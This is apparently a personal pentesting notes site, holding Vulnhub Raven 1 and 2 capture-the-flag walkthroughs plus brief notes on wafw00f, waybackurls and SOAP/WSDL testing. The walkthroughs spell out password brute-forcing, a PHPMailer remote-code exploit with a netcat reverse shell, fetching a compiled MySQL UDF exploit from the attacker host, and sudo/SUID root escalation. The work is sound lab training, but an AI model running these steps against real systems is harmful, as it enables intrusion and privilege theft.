                            Opening the browser in http://192.168.56.104/wordpress/readme.html, we can see some instructions to set up the wordpress installation.

                            As a matter of fact, by clicking on http://192.168.56.104/wp-admin/install.php, we end up on a webpage like this:

Nice. The link button is giving us a tip: we need to include a redirection in our /etc/hosts file.

                            sudo nano /etc/hosts\n

                            At the end of the file we add the following line:

192.168.56.104  raven.local\n# CTRL-s  and CTRL-x\n

Now we can browse the wordpress site perfectly. Also, once our wpscan finishes, there are two more interesting findings:

                            These findings are:

                            • Wordpress: WordPress version 4.8.7 identified (Insecure, released on 2018-07-05).
                            • User enumeration: steven and michael.

We can also detect those users manually, simply by enumerating post authors. See the screenshot:

                            To manually brute force users in a wordpress installation, you just need to go to:

                            • targetURL/?author=1

The author with id=1 (as in the example) is the first user created during the CMS installation, which usually coincides with the admin user. To see the next user, you just need to change the number; IDs are sequential. By checking the source code (as in the previous screenshot) you can gather users (steven and michael), but also the wordpress version (4.8.7) and theme (TwentySeventeen).
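A quick way to script this check (a hypothetical sketch; on installations with pretty permalinks, the redirect's Location header leaks each username):

for i in 1 2 3; do curl -s -I \"http://raven.local/wordpress/?author=$i\" | grep -i '^location'; done\n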

                            So, what do we have so far?

                            • Server: Apache/2.4.10 (Debian)
                            • CMS: WordPress version 4.8.7 identified (Insecure, released on 2018-07-05)
                            • Theme: twentySeventeen
                            • XML-RPC seems to be enabled: http://192.168.56.104/wordpress/xmlrpc.php.
                            • Login page: http://raven.local/wordpress/wp-login.php
                            • Two users: steven, michael.
                            ","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-1/#exploiting-findings","title":"Exploiting findings","text":"","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-1/#bruce-forcing-passwords-for-the-cms","title":"Bruce-forcing passwords for the CMS","text":"

Not having found anything after testing input validation on the application's endpoints, I'm going to try to brute-force the login of steven, who is the user with id=2.

                            wpscan --url http://192.168.56.104/wordpress --passwords /usr/share/wordlists/rockyou.txt  --usernames steven -t 25\n

Results:

                            Now, we have:

                            • user: steven
                            • password: pink84

These credentials are good to log into the wordpress and... retrieve flag3!!!

                            Flag3 was hidden in the draft of a post. Here, in plain text:

                            flag3{afc01ab56b50591e7dccf93122770cd2}\n
                            ","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-1/#using-credentials-found-for-wordpress-in-a-different-service-ssh","title":"Using credentials found for wordpress in a different service (ssh)","text":"

It's not uncommon to reuse the same usernames and passwords across services. So, having found steven's password for wordpress, we may try the same credentials on a different service. Therefore, we will try to access port 22 (which was open) and see if these creds are valid:

                            ssh steven@192.168.56.104\n

                            After confirming \"fingerprinting\", we are asked to introduce steven's password, and... it works!

                            ","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-1/#escalation-of-privileges","title":"Escalation of privileges","text":"

We can see who we are and to which groups we belong (id), the version of the running server (uname -a), and which commands we are allowed to run (sudo -l). And here comes the juicy part: as you may see in the screenshot, we can run the python command as root without entering a password.

                            Resources: This site is a must when it comes to Unix binaries that can be used to bypass local security restrictions https://gtfobins.github.io

                            In particular, we can easily spot this valid exploit: https://gtfobins.github.io/gtfobins/python/#sudo. What does it say about python? If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.

                            This is just perfect. So to escalate to root we just need to run:

                            sudo python -c 'import os; os.system(\"/bin/sh\")'\n

                            See the results:

                            ","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-1/#getting-the-flags","title":"Getting the flags","text":"

                            Printing flags now is not difficult at all:

find . -name \"flag*.txt\" 2>/dev/null\n

                            And results:

                            ./var/www/flag2.txt\n./root/flag4.txt\n

                            We can print them now:

                            cat /var/www/flag2.txt\n
                            Results:

                            flag2{fc3fd58dcdad9ab23faca6e9a36e581c}\n
                            cat /root/flag4.txt\n

                            Results:

                            ______                      \n\n| ___ \\                     \n\n| |_/ /__ ___   _____ _ __  \n\n|    // _` \\ \\ / / _ \\ '_ \\ \n\n| |\\ \\ (_| |\\ V /  __/ | | |\n\n\\_| \\_\\__,_| \\_/ \\___|_| |_|\n\n\nflag4{715dea6c055b9fe3337544932f2941ce}\n\nCONGRATULATIONS on successfully rooting Raven!\n\nThis is my first Boot2Root VM - I hope you enjoyed it.\n\nHit me up on Twitter and let me know what you thought: \n\n@mccannwj / wjmccann.github.io\n

                            ","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-1/#commands-and-tools","title":"Commands and tools","text":"","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-1/#commands-used-to-exploit-the-machine","title":"Commands used to exploit the machine","text":"
sudo netdiscover -i eth1 -r 192.168.56.102/24\nsudo nmap -p- -A 192.168.56.104\ndirb http://192.168.56.104\nwpscan --url http://192.168.56.104/wordpress --enumerate u --force --wp-content-dir wp-content\necho \"192.168.56.104    raven.local\" | sudo tee -a /etc/hosts\nwpscan --url http://192.168.56.104/wordpress --passwords /usr/share/wordlists/rockyou.txt --usernames steven -t 25\nssh steven@192.168.56.104\nsudo python -c 'import os; os.system(\"/bin/sh\")'\nfind . -name \"flag*.txt\" 2>/dev/null\n
                            ","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-1/#tools","title":"Tools","text":"
                            • dirb.
                            • netdiscover.
                            • nmap.
                            • wpscan.
                            ","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-2/","title":"Walkthrough: Raven 2, a vulnhub machine","text":"","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-2/#about-the-machine","title":"About the machine","text":"data Machine Raven 2 Platform Vulnhub url link Download https://drive.google.com/open?id=1fXp4JS8ANOeClnK63LwgKXl56BqFJ23z Download Mirror https://download.vulnhub.com/raven/Raven2.ova Size 765 MB Author William McCann Release date 9 November 2018 Description Raven 2 is an intermediate level boot2root VM. There are four flags to capture. After multiple breaches, Raven Security has taken extra steps to harden their web server to prevent hackers from getting in. Can you still breach Raven? Difficulty Intermediate OS Linux","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-2/#walkthrough","title":"Walkthrough","text":"","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-2/#setting-up-the-machines","title":"Setting up the machines","text":"

                            I'll be using Virtual Box.

                            Kali machine (from now on: attacker machine) will have two network interfaces:

                            • eth0 interface: NAT mode (for internet connection).
                            • eth1 interface: Host-only mode (for attacking the victim machine).

Raven 2 machine (from now on: victim machine) will have only one network interface:

                            • eth0 interface.

                            After running

                            ip a\n
                            we know that the attacker's machine IP address is 192.168.56.102/24.

                            ","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-2/#reconnaissance","title":"Reconnaissance","text":"","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-2/#identify-victims-ip","title":"Identify victim's IP","text":"

                            To discover the victim's machine IP, we run:

                            sudo netdiscover -i eth1 -r 192.168.56.102/24\n

                            These are the results:

Usually, the victim's IP is the last one listed, in this case 192.168.56.104, BUT as this lab was performed over several days, the victim's machine IP will eventually switch to 192.168.56.105.

                            ","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-2/#scan-victims-surface-attack","title":"Scan victim's surface attack","text":"

                            Now we can run a scanner to see which services are running on the victim's machine:

                            sudo nmap -p- -A 192.168.56.104\n

                            And the results:

Having a web server on port 80, it's inevitable to open a browser and have a look at it. At the same time, we can run a simple enumeration scan with dirb:

                            dirb http://192.168.56.104\n
                            By default, dirb is using /usr/share/dirb/wordlists/common.txt. The results are pretty straightforward:

There are two quite appealing folders:

                            • A wordpress installation running on the server.
                            • A vendor installation with a service such as PHPMailer installed.
                            ","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-2/#deeper-scan-with-specific-tool-for-wordpress-service-wpscan","title":"Deeper scan with specific tool for wordpress service: wpscan","text":"

First, let's start by running a much deeper scan with wpscan. We'll be enumerating users:

                            wpscan --url http://192.168.56.104/wordpress --enumerate u --force --wp-content-dir wp-content\n

                            And the results show us some interesting findings:

                            Main findings:

• XML-RPC seems to be enabled: http://192.168.56.104/wordpress/xmlrpc.php. What does this service do? It allows authenticated posting of entries. It's also used by wordpress to receive pings when a post is linked back. This means that it's also an open door for exploitation. We'll return to this later.
                            • WordPress readme found: http://raven.local/wordpress/readme.html
                            • Upload directory has listing enabled: http://raven.local/wordpress/wp-content/uploads/.
                            • WordPress version 4.8.7.
                            • WordPress theme in use: twentyseventeen.
                            • Enumerating Users: michael, steven.

Opening the browser at http://192.168.56.104/wordpress/readme.html, we can see some instructions to set up the wordpress installation. As a matter of fact, by clicking on http://192.168.56.105/wp-admin/install.php, we end up on a webpage whose source code points to raven.local. We need to include a redirection in our /etc/hosts file. (This is better explained in the Vulnhub Raven 1 walkthrough.)

                            sudo nano /etc/hosts\n

                            At the end of the file we add the following line:

192.168.56.104  raven.local\n# CTRL-s  and CTRL-x\n

There was another open folder: http://raven.local/wordpress/wp-content/uploads/. Using the browser we can walk through it.

                            And now we have flag3:

Now let's look at the user enumeration. You can go to the walkthrough of the Vulnhub Raven 1 machine to see how to manually brute-force users in a wordpress installation.

                            ","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-2/#exploiting-findings","title":"Exploiting findings","text":"","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-2/#bruce-forcing-passwords-for-the-cms","title":"Bruce-forcing passwords for the CMS","text":"

Not having found anything after testing input validation on the application's endpoints, I'm going to try to brute-force the login of steven, who is the user with id=2.

                            wpscan --url http://192.168.56.105/wordpress --passwords /usr/share/wordlists/rockyou.txt  --usernames steven -t 25\n

                            And also with michael:

                            wpscan --url http://192.168.56.105/wordpress --passwords /usr/share/wordlists/rockyou.txt --usernames michael -t 25\n

                            No valid password is found.

                            ","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-2/#browse-listable-folders-that-are-supposed-to-be-close","title":"Browse listable folders that are supposed to be close","text":"

                            Besides the wordpress installation, our dirb scan gave us another interesting folder: http://192.168.56.105/vendor. Browsing around you can find the service PHPMailer installed.

Two interesting findings regarding the PHPMailer service:

One is the PATH file, which contains the path to the service and one of the flags:

                            In plain text:

                            /var/www/html/vendor/\nflag1{a2c1f66d2b8051bd3a5874b5b6e43e21}\n

The second is the VERSION file, which reveals that the PHPMailer service is at version 5.2.16, which is potentially vulnerable.

                            ","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-2/#exploiting-the-service-phpmailer-5216","title":"Exploiting the service PHPMailer 5.2.16","text":"

                            After googling \"phpmailer 5.2.16 exploit\", we have these results:

                            • https://www.exploit-db.com/exploits/40974.

                            What is this vulnerability about? Quoting Legalhackers:

                            An independent research uncovered a critical vulnerability in PHPMailer that could potentially be used by (unauthenticated) remote attackers to achieve remote arbitrary code execution in the context of the web server user and remotely compromise the target web application. To exploit the vulnerability an attacker could target common website components such as contact/feedback forms, registration forms, password email resets and others that send out emails with the help of a vulnerable version of the PHPMailer class.

When it comes to the Raven 2 machine, we realize that the site uses a contact form:

                            We can use the exploit from https://www.exploit-db.com/exploits/40974.

The original exploit looks like this (the fields we are going to change are highlighted):

And this is anarconder.py, saved with execution permissions on our attacker machine (my changes to the original script are highlighted):

                            We launch the script:

                            python3 anarconder.py\n

And open port 4444 in listening mode with netcat:

nc -lnvp 4444\n

Now, I will open http://192.168.56.105/zhell.php in the browser to get the reverse shell in my netcat connection.

                            And we can browse to /var/www and get flag2.txt

                            flag2.txt in plain text:

                            flag2{6a8ed560f0b5358ecf844108048eb337}\n

Also, a nice thing to do on every wordpress installation is checking for credentials in the config file (if present). So by browsing to /var/www/html/wordpress, we can see:

                            And reading the file, we can see some credentials:

                            cat wp-config.php\n

                            So now we also have these credentials:

                            • user: root
                            • password: R@v3nSecurity

We can try to access the SSH service running on port 22 with those credentials, without success. We can also try to escalate from the open shell, but we get the message that \"su root must be run from terminal\".
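One generic workaround for that restriction, given that python is installed on the victim (we verify this below), is to upgrade the shell to a pseudo-terminal:

python -c 'import pty; pty.spawn(\"/bin/bash\")'\n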

                            ","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-2/#escalation-of-privileges","title":"Escalation of privileges","text":"

First, let's see who we are and to which groups we belong (id), the kernel version of the running system (uname -a), and which commands we are allowed to run (sudo -l).
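In commands, just the checks named above:

id\nuname -a\nsudo -l\n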

Also, there are some nice tools that we could run on the victim machine if python is installed. Let's check:

                            which python\n
                            Result:

                            /usr/bin/python\n

Nice, let's proceed. There is a cool enumeration tool for linux called Linux Privilege Checker (linuxprivchecker.py), which we can download from the referenced github repo and serve from our attacker machine:

                            cp linuxprivchecker.py /var/www/html\ncd /var/www/html\nservice apache2 start\n

                            And then, from the victim machine:

                            cd /tmp\nwget http://192.168.56.102/linuxprivchecker.py\n

                            Now we can run it and see the results:

                            python /tmp/linuxprivchecker.py\n

Once you run it, you will get an enumeration of potential escalation exploits. Since we potentially have root credentials for a service, we will try the MySQL 4.x/5.0 UDF (user-defined function) vulnerability.

After reviewing the exploit http://www.exploit-db.com/exploits/1518, we copy-paste it and save it as 1518.c on our apache server:

                            cd /var/www/html/\nvi 1518.c\n# and we copy paste the exploit\n

Compiling this C code on the victim machine gives us an error.

So, instead, we are going to compile it on the attacker machine.

# To create 1518.o from 1518.c\nsudo gcc -g -c 1518.c\n\n# To create 1518.so from both 1518.c and 1518.o\nsudo gcc -g -shared -Wl,-soname,1518.so -o 1518.so 1518.o -lc \n

The file the victim machine is going to fetch is 1518.so. So, from /tmp on the victim machine:

                            cd /tmp\nwget http://192.168.56.102/1518.so\n

Now, on the victim machine, we log in to the MySQL service:

                            mysql -u root -p\n\n# when asked about password, we enter R@v3nSecurity\n

                            We're in! Let's do some digging:

                            # List databases\nSHOW databases;\n\n# Select a database\nuse mysql;\n

Exploiting the vulnerability: we'll create a table in the database with a single column, and insert into that column the contents of our payload file with the .so extension.

                            create table foo(line blob);\ninsert into foo values(load_file('/tmp/1518.so'));\n

                            So far:

![Mysql capture](img/raven2-19.png)

Now, we are going to dump the file from that column to a different location, let's say /usr/lib/mysql/plugin/1518.so:

                            select * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so';\n\n# We will execute\ncreate function do_system returns integer soname '1518.so';\n

                            If we now execute:

                            select do_system('chmod u+s /usr/bin/find');\nexit\n

                            Now, if we check suid binaries, we can see \"find\" among them.
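A quick, standard way to list SUID binaries (not specific to this walkthrough):

find / -perm -4000 2>/dev/null\n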

Now, if we create a file such as \"tocado\" in the /tmp folder of the victim machine and run 'find file -exec code', find will execute that code as root each time it matches the file, since find is now SUID root.

                            Then, we can run:

                            touch tocado\nfind tocado -exec \"whoami\" \\;\nfind tocado -exec \"/bin/sh\" \\;\nwhoami\n

                            ","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-2/#getting-the-flag","title":"Getting the flag","text":"

                            We just need to go to the root folder:

                            cd /root\nls -la\ncat flag4.txt\n

                            flag4.txt in plain text:

                              ___                   ___ ___ \n | _ \\__ ___ _____ _ _ |_ _|_ _|\n |   / _` \\ V / -_) ' \\ | | | | \n |_|_\\__,_|\\_/\\___|_||_|___|___|\n\nflag4{df2bc5e951d91581467bb9a2a8ff4425}\n\nCONGRATULATIONS on successfully rooting RavenII\n\nI hope you enjoyed this second interation of the Raven VM\n\nHit me up on Twitter and let me know what you thought: \n
                            ","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-2/#commands-used-to-exploit-the-machine","title":"Commands used to exploit the machine","text":"
ip a\nsudo netdiscover -i eth1 -r 192.168.56.102/24\nsudo nmap -p- -A 192.168.56.105\ndirb http://192.168.56.105\nwpscan --url http://192.168.56.105/wordpress --enumerate u --force --wp-content-dir wp-content\npython3 anarconder.py\nnc -lnvp 4444\n\ncat wp-config.php\ncd /tmp\nwget http://192.168.56.102/linuxprivchecker.py\npython /tmp/linuxprivchecker.py\n\n\ncd /var/www/html/\nvi 1518.c\n# and we copy paste the exploit\n\n# To create 1518.o from 1518.c\nsudo gcc -g -c 1518.c\n\n# To create 1518.so from both 1518.c and 1518.o\nsudo gcc -g -shared -Wl,-soname,1518.so -o 1518.so 1518.o -lc \n\nmysql -u root -p\n\n# List databases\nSHOW databases;\n\n# Select a database\nuse mysql;\n\ncreate table foo(line blob);\ninsert into foo values(load_file('/tmp/1518.so'));\n\nselect * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so';\n\n# We will execute\ncreate function do_system returns integer soname '1518.so';\n\nselect do_system('chmod u+s /usr/bin/find');\nexit\n\ntouch tocado\nfind tocado -exec \"whoami\" \\;\nfind tocado -exec \"/bin/sh\" \\;\nwhoami\n
                            ","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-2/#tools","title":"Tools","text":"
                            • dirb.
                            • netdiscover.
                            • nmap.
                            • wpscan.
• mysql.
                            ","tags":["pentesting","web pentesting","walkthrough"]},{"location":"w3af/","title":"w3af","text":"

                            w3af is a\u00a0Web Application Attack and Audit Framework.

                            ","tags":["pentesting","web pentesting"]},{"location":"w3af/#installation","title":"Installation","text":"

                            Download from: https://github.com/andresriancho/w3af.

                            W3af documentation.

                            ","tags":["pentesting","web pentesting"]},{"location":"wafw00f/","title":"WafW00f - A firewall scanner","text":"

                            WafW00f is a web application firewall (WAF) fingerprinting tool that sends requests and analyses responses to determine if a security solution is in place.

                            WAFW00F does the following:

                            • Sends a\u00a0normal\u00a0HTTP request and analyses the response; this identifies a number of WAF solutions.
                            • If that is not successful, it sends a number of (potentially malicious) HTTP requests and uses simple logic to deduce which WAF it is.
                            • If that is also not successful, it analyses the responses previously returned and uses another simple algorithm to guess if a WAF or security solution is actively responding to our attacks.
                            ","tags":["pentesting","web pentesting","enumeration"]},{"location":"wafw00f/#installation","title":"Installation","text":"

                            We can install it with the following command:

                            sudo apt install wafw00f -y\n
                            ","tags":["pentesting","web pentesting","enumeration"]},{"location":"wafw00f/#basic-usage","title":"Basic usage","text":"
                            wafw00f -v https://www.example.com\n\n# -a: check all possible WAFs in place instead of stopping scanning at the first match.\n# -i: read targets from an input file \n# -p proxy the requests \n
                            ","tags":["pentesting","web pentesting","enumeration"]},{"location":"walkthroughs/","title":"Index of walkthroughs","text":"","tags":["walkthrough"]},{"location":"walkthroughs/#well-this-is-a-mess","title":"Well, this is a mess","text":"

                            It feels like an eternity since I embarked on my first walkthroughs of the Overthewire game challenges. However, the reality is that this happened just one year ago (or maybe two). During those days, I was consumed by an intense obsession with documenting every single step I took. Allow me to relive and share a snippet of my explanation for progressing from level 31 to level 32 in Bandit so you can draw your own conclusions:

                            Click to keep reading why this is a mess
                            1. mkdir /tmp/amanda31\n2. cd /tmp/amanda31\n3. git clone ssh://bandit31-git@localhost/home/bandit31-git/repo\n4. cd repo\n\n# when listing repo, you can realize that there is a .gitignore file\n5. ls -la\n\n# Print the .gitignore file to see which changes are not being commited\n6. cat .gitignore\n\n# \"*.txt\" files are being excluded from being pushed\n7. cat README.md\n\n# README.md file will provide you with the instructions to pass the level: \"This time your task is to push a file to the remote repository.\n# Details:\n#    File name: key.txt\n#    Content: 'May I come in?'\n#    Branch: master  \"\n\n# Remove \"*.txt\" from .gitignore\"\n8. echo \"\" > .gitignore\n\n# Create a key.txt file\n9. echo \"May I come in?\" > ./.git/key.txt\n\n# Add these changes to the commit\n10. git add -A\n\n# Commit the changes in your repository. A line with the explanation of the changes may be required\n11. git commit\n\n# Push the changes to the server\n12. git push\n\n# In the results of the git push commands, the server will \n# provide the password for the next level.\n

                            Smile on my face. I even commented what \"git push\" or \"cat file.txt\" were executing! XDDDDDDDD

                            I also vividly remember spending A LOT of time doing this. But you know what? I don't care what my colleagues say. All that time was completely worthwhile because it helped me integrate that knowledge into my tired brain. Take, for instance, the walkthrough of vulnhub Goldeneye 1. It took me a while to format and prepare it for sharing (and I did it with the intention of sharing).

                            Now things have changed. I don't do that anymore. I've become selfish. My walkthroughs have transformed into a list of steps linked to tools, tags and concise explanations, solely for the purpose of helping me remember that machine. They are probably only useful to me (not suitable for LinkedIn hahaha).

                            Anyway, at some point, I needed to make this decision. More labs and self-centered documentation? Or more detailed walkthroughs and fewer labs (and consequently falling behind on my goals)? More labs, geee!

                            All of this is just to say that in this repository, you will find incredibly detailed walkthroughs (even with multiple ways of exploiting a machine) along with quick guides containing raw commands. All of them together and for no reason. Please, bear with me!

                            ","tags":["walkthrough"]},{"location":"walkthroughs/#updated-list-of-walkthroughs-writeups","title":"Updated list of walkthroughs - writeups","text":"
                            • Vulnhub GoldenEye 1
                            • Vulnhub Raven 1
                            • Vulnhub Raven 2
                            • HTB appointment
                            • HTB archetype
                            • HTB bank
                            • HTB base
                            • HTB crocodile
                            • HTB explosion
                            • HTB friendzone
                            • HTB funnel
                            • HTB included
                            • HTB ignition
                            • HTB lame
                            • HTB markup
                            • HTB metatwo
                            • HTB mongod
                            • HTB nibbles
                            • HTB nunchucks
                            • HTB omni
                            • HTB oopsie
                            • HTB pennyworth
                            • HTB photobomb
                            • HTB popcorn
                            • HTB redeemer
                            • HTB responder
                            • HTB sequel
                            • HTB support
                            • HTB tactics
                            • HTB trick
                            • HTB undetected
                            • HTB unified
                            • HTB usage
                            • HTB vaccine
                            ","tags":["walkthrough"]},{"location":"waybackurls/","title":"waybackurls","text":"

waybackurls inspects URLs saved by the Wayback Machine and looks for specific keywords.

                            ","tags":["pentesting","reconnaissance","tools"]},{"location":"waybackurls/#installation","title":"Installation","text":"
                            go install github.com/tomnomnom/waybackurls@latest\n
                            ","tags":["pentesting","reconnaissance","tools"]},{"location":"waybackurls/#basic-usage","title":"Basic usage","text":"
                            waybackurls -dates https://example.com > waybackurls.txt\n\ncat waybackurls.txt\n
                            ","tags":["pentesting","reconnaissance","tools"]},{"location":"web-services/","title":"Pentesting web services","text":"","tags":["pentesting","webservices","soap"]},{"location":"web-services/#web-services-vs-web-applications","title":"Web services vs. Web applications","text":"
                            • Interoperability: Web services promote interoperability by providing a standardized way for applications to communicate. They rely on open standards like HTTP, XML, SOAP, REST, and JSON to ensure compatibility.
                            • Platform-agnostic: Web services are not tied to a specific operating system or programming language. They can be developed in various technologies, making them versatile and accessible.
                            ","tags":["pentesting","webservices","soap"]},{"location":"web-services/#web-services-vs-apis","title":"Web services vs. APIs","text":"

                            Web services and APIs (Application Programming Interfaces) are related concepts in web development, but they have distinct differences. Web services are a broader category of technologies used to enable machine-to-machine communication and data exchange over the internet. They encompass various protocols and data formats. APIs, on the other hand, are a set of rules and tools that allow developers to access the functionality or data of a service, application, or platform.

                            ","tags":["pentesting","webservices","soap"]},{"location":"web-services/#implementation-of-web-services","title":"Implementation of web services","text":"

                            Web service implementations refer to the different ways in which web services can be created, deployed, and used. There are several methods and technologies available for implementing web services.

                            • SOAP (Simple Object Access Protocol): SOAP is a protocol for exchanging structured information in the implementation of web services. SOAP-based web services use XML as their message format and can be implemented using various programming languages.
                            • JSON-RPC and XML-RPC: JSON-RPC and XML-RPC are lightweight protocols for remote procedure calls (RPC) using JSON or XML, respectively. These are simpler alternatives to SOAP for implementing web services.
                            • REST (Representational State Transfer): REST is an architectural style for designing networked applications, and it uses HTTP as its communication protocol.
                            ","tags":["pentesting","webservices","soap"]},{"location":"web-services/#xml-rpc","title":"XML-RPC","text":"
                            • XML-RPC (Extensible Markup Language - Remote Procedure Call) created in 1998, is a protocol and a set of conventions for encoding and decoding data in XML format and using it for remote procedure calls (RPC).
                            • It is a simple and lightweight protocol for enabling communication between software applications running on different systems, often over a network like the internet.
                            • XML-RPC has been used as a precursor to more modern web service protocols like SOAP and REST.
                            • It works by sending HTTP requests that call a single method implemented on the remote system.
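As an illustration, a minimal XML-RPC call posted in the body of an HTTP request (method name and argument are made up):

<?xml version=\"1.0\"?>\n<methodCall>\n  <methodName>demo.sayHello</methodName>\n  <params>\n    <param><value><string>world</string></value></param>\n  </params>\n</methodCall>\n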
                            ","tags":["pentesting","webservices","soap"]},{"location":"web-services/#json-rpc","title":"JSON-RPC","text":"
                            • JSON-RPC (Remote Procedure Call) is a remote procedure call (RPC) protocol encoded in JSON (JavaScript Object Notation).
                            • Like XML-RPC, JSON-RPC enables communication between software components or systems running on different machines or platforms.
                            • JSON-RPC is known for its simplicity and ease of use and has become popular in web development and microservices architectures.
• JSON-RPC is very similar to XML-RPC; however, it is usually preferred because it provides much more human-readable messages and requires less data for communication.
                            • JSON-RPC allows a client to invoke methods or functions on a remote server by sending a JSON object that specifies the method to call and its parameters.
                            • The message sent to invoke a method is a request with a single object serialized using JSON. It has three properties:
                              • method: name of the method to invoke
                              • params: an array of objects to pass as arguments
                              • id: request ID used to match the responses/requests
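For illustration, a request that invokes a hypothetical getUser method, using exactly the three properties above:

{\"method\": \"getUser\", \"params\": [42], \"id\": 1}\n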
                            ","tags":["pentesting","webservices","soap"]},{"location":"web-services/#soap","title":"SOAP","text":"

                            SOAP (Simple Object Access Protocol) is a protocol for exchanging structured information in the implementation of web services. It is a protocol that defines a set of rules and conventions for structuring messages, defining remote procedure calls (RPC), and handling communication between software components over a network, typically the internet.

                            SOAP is seen as the natural successor to XML-RPC and is known for its strong typing and extensive feature set, which includes security, reliability, and transaction support.

                            SOAP Web Services may also provide a Web Services Definition language (WSDL) declaration that specifies how they may be used or interacted with.
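A skeleton SOAP 1.1 request over HTTP, as a sketch only (host, operation and namespace are hypothetical):

POST /service HTTP/1.1\nHost: example.com\nContent-Type: text/xml; charset=utf-8\nSOAPAction: \"http://example.com/GetUser\"\n\n<?xml version=\"1.0\"?>\n<soap:Envelope xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\n  <soap:Body>\n    <GetUser xmlns=\"http://example.com/\"><id>1</id></GetUser>\n  </soap:Body>\n</soap:Envelope>\n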

                            ","tags":["pentesting","webservices","soap"]},{"location":"web-services/#rest-restful-apis","title":"REST (RESTful APIs)","text":"

                            REST, which stands for Representational State Transfer, is an architectural style for designing networked applications. It is not a protocol or technology itself but rather a set of principles and constraints that guide the design of web services and APIs (Application Programming Interfaces).

                            REST is widely used for building scalable, stateless, and easy-to-maintain web services/APIs that can be accessed over the internet. REST web services generally use JSON or XML, but any other message transport format like plain-text can be used.
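By contrast, a typical REST call can be made with any plain HTTP client; here with curl against a hypothetical endpoint:

curl -X GET https://api.example.com/users/1 -H \"Accept: application/json\"\n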

                            ","tags":["pentesting","webservices","soap"]},{"location":"web-services/#wsdl-language-fundamentals","title":"WSDL Language Fundamentals","text":"

                            WSDL, which stands for Web Services Description Language, is an XML-based language used to describe the functionality and interface of a web service, typically, SOAP-based web services (Simple Object Access Protocol).

                            Versions: At the time of writing, WSDL can be distinguished in two main versions: 1.1 and 2.0. Although 2.0 is the current version, many web services still use WSDL 1.1.

                            ","tags":["pentesting","webservices","soap"]},{"location":"web-services/#the-wsdl-document","title":"The WSDL Document","text":"

                            A WSDL document is typically created to describe a SOAP-based web service. It defines the service's operations, their input and output message structures, and how they are bound to the SOAP protocol.

                            First of all, it is important to know that WSDL documents have abstract and concrete definitions:

                            • Abstract: describes what the service does, such as the operation provided, the input, the output and the fault messages used by each operation
                            • Concrete: adds information about how the web service communicates and where the functionality is offered

                            The WSDL document effectively documents the API provided by the service. The WSDL document serves as a contract between the service provider and consumers. It specifies how clients should construct SOAP requests to interact with the service. This contract defines the operations, their input parameters, and expected responses.

                            ","tags":["pentesting","webservices","soap"]},{"location":"web-services/#wsdl-components","title":"WSDL components","text":"
                            • Types: The <types> section defines the data types used in the web service. It typically includes XML Schema Definitions (XSD) that specify the structure and constraints of input and output data.
                            • Message: The <message> element defines the data structures used in the messages exchanged between the client and the service. Messages can have multiple parts, each with a name and a type definition referencing the types defined in the <types> section.
                            • Port Type: The <portType> element describes the operations that the web service supports. Each operation corresponds to a method or function that a client can invoke. It specifies the input and output messages for each operation. The operation object defined within a port type, represents a specific action that a service can perform. It specifies the name of the operation, the input message structure, the output message structure, and, optionally, fault messages that can occur during the operation.
                            • Binding: The <binding> element specifies how the service operations are bound to a particular protocol, such as SOAP over HTTP. It defines details like the protocol, message encoding, and endpoint addresses.
                            • Service: The <service> element provides information about the service itself. It includes the service's name and its endpoint address, which is the URL where clients can access the service.

                            Instead of portType, WSDL v. 2.0 uses interface elements which define a set of operations representing an interaction between the client and the service. Each operation specifies the types of messages that the service can send or receive.

Unlike the old portType, interface elements do not point to messages anymore (the message element does not exist in v. 2.0). Instead, they point to the schema elements contained within the types element.
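A stripped-down WSDL 1.1 skeleton showing how these components nest (all names are placeholders):

<definitions xmlns=\"http://schemas.xmlsoap.org/wsdl/\" name=\"UserService\">\n  <types>...</types>\n  <message name=\"GetUserRequest\">...</message>\n  <portType name=\"UserPortType\">\n    <operation name=\"GetUser\">...</operation>\n  </portType>\n  <binding name=\"UserBinding\" type=\"tns:UserPortType\">...</binding>\n  <service name=\"UserService\">\n    <port name=\"UserPort\" binding=\"tns:UserBinding\">...</port>\n  </service>\n</definitions>\n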

                            ","tags":["pentesting","webservices","soap"]},{"location":"web-services/#web-service-security-testing","title":"Web Service Security Testing","text":"

                            Web service security testing is the process of evaluating the security of web services to identify vulnerabilities, weaknesses, and potential threats that could compromise the confidentiality, integrity, or availability of the service or its data.

                            ","tags":["pentesting","webservices","soap"]},{"location":"web-services/#information-gathering-and-analysis","title":"Information Gathering and Analysis","text":"

                            1. Identify the SOAP web services that need to be tested.

                            2. Identify the WSDL file for the SOAP web service.

Once the SOAP service has been identified, a way to discover WSDL files is by appending ?wsdl, .wsdl, ?disco or wsdl.aspx to the end of the service URL (see the example after these steps):

                            3. With WSDL document identified we may gather information about the web service endpoints, operations, and data exchanged.

                            4. Understand the security requirements, authentication methods, and authorization mechanisms in place.
